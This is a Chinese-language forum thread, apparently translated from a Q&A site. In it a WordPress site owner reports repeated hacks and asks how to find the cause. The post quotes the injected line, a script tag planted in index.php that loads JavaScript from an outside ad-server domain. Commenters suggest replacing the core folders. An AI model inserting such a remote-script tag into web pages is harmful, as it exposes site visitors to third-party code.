【发布时间】:2011-12-07 09:39:21
【问题描述】:
网站现在已经被黑客入侵两次了,我一直遇到同样的问题,我必须下载网站并进行查找和替换以修复它,但似乎并没有解决我的问题
这是他们在 wordpress 的 index.php 文件中插入的代码,它的权限设置为 644。
<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>
我认为这可能是 sql 注入,因为所有文件和文件夹都被锁定为正确的权限 644 755 等。
有人可以告诉我一个我可以用来测试的 mac SQL 注入测试工具吗,我已经阅读了另一篇文章并将我所有的 ftp 帐户更改为 sftp 以确保安全,他们还有什么我缺少的吗?
谢谢
【问题讨论】:
-
您使用的是最新版本的 wordpress 吗?你如何托管这个网站?是在您自己的服务器上还是通过托管公司?
-
您好,该网站由我们的客户托管在 media Temple 上,我也已更新到 wordpress 的最新版本
-
您使用的是共享主机还是 vps 主机?还有你正在使用什么插件和扩展功能。
-
vps 托管各种插件会是问题吗?
-
如果您使用的是最新版本的 Wordpress,请下载新副本并手动删除并完全替换 /wp-admin/ 和 /wp-includes/。一些黑客可能会将脚本潜入那些在 Wordpress 自动更新时未被删除的文件夹中。
标签: javascript wordpress xss